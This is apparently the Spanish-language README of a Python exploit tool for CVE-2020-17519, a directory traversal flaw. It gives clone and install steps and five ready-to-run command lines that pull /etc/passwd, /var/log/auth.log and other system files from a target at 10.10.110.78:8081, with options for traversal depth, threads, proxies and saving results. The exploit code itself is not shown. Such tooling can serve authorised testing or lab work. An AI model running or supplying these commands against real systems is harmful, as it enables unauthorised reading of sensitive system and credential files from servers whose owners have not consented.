
Una herramienta en Python que utiliza una técnica de traversal de directorios para solicitar archivos de registro desde una URL de destino. Muestra el progreso en tiempo real, admite la configuración de proxy y, opcionalmente, guarda las respuestas válidas.
requests y pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
La herramienta se puede ejecutar desde la línea de comandos con varias opciones. A continuación se muestran algunos ejemplos:
Ejemplo 1: Solicitar una única ruta de archivo
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
Ejemplo 2: Solicitar múltiples rutas de archivo desde una lista
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
Ejemplo 3: Ejecutar con proxy deshabilitado
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
Ejemplo 4: Usar una lista de archivos y guardar las respuestas válidas
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
Ejemplo 5: Solicitar un único archivo con mayor profundidad
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
Para más detalles, consulta el código fuente y los comentarios en línea.